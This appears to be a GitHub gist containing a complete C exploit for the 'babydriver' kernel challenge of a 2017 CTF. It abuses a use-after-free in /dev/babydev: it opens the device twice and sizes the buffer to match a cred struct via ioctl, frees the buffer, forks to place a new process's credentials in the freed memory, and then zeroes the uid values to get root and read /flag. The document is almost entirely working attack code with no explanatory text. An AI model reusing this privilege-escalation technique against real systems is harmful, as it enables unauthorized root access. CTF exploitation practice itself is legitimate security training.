Skip to content

Instantly share code, notes, and snippets.

@Eadom

Eadom/uctf2017_babydriver.c Secret

Created July 10, 2017 08:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Eadom/c88f1eab2853281583aab150382ec710 to your computer and use it in GitHub Desktop.
Save Eadom/c88f1eab2853281583aab150382ec710 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
uctf2017_babydriver.c
// uctf2017 babydriver.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mman.h>
#include <asm/ioctl.h>
#include <unistd.h>
#define CMD ("id;cat /flag;")
char *pbuf = 0x30000000;
int size = 0xa8;
int alloc()
{
if (!mmap(0x30000000, 0x20000, PROT_EXEC | PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0))
{
puts("[!]mmap Error");
exit(-1);
}
memset(pbuf, 0x66, 0x20000);
return 0;
}
int main()
{
int fd1, fd2;
fd2 = open("/dev/babydev", O_RDWR);
if (fork())
{
printf("[*]p1 start\n");
fd1 = open("/dev/babydev", O_RDWR);
if (ioctl(fd1, 0x10001, size) == -1)
{
perror("ioctl");
}
close(fd1);
puts("[*]p1 exit");
exit(0);
}
else
{
sleep(1);
if (fork())
{
printf("[*]p3 start\n");
for (int i = 0; i < 10; i++)
{
if (!fork())
{
//root process
sleep(10);
system(CMD);
while (1)
{
sleep(10);
}
}
}
printf("[*]p3 exit\n");
}
else
{
sleep(1);
alloc();
printf("[*]p2 start\n");
if (read(fd2, pbuf, size - 1) < 0)
{
perror("read");
}
if (*((unsigned int *)pbuf + 1) == 0x3e8)
{
printf("FIND cred, try to edit\n");
for (int i = 0; i < size / 4; i++)
{
if (*((unsigned int *)pbuf + i) == 0x3e8)
{
*((unsigned int *)pbuf + i) = 0;
}
}
write(fd2, pbuf, size - 1);
}
printf("[*]p2 exit\n");
}
sleep(10);
system(CMD);
while (1)
{
sleep(10);
}
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment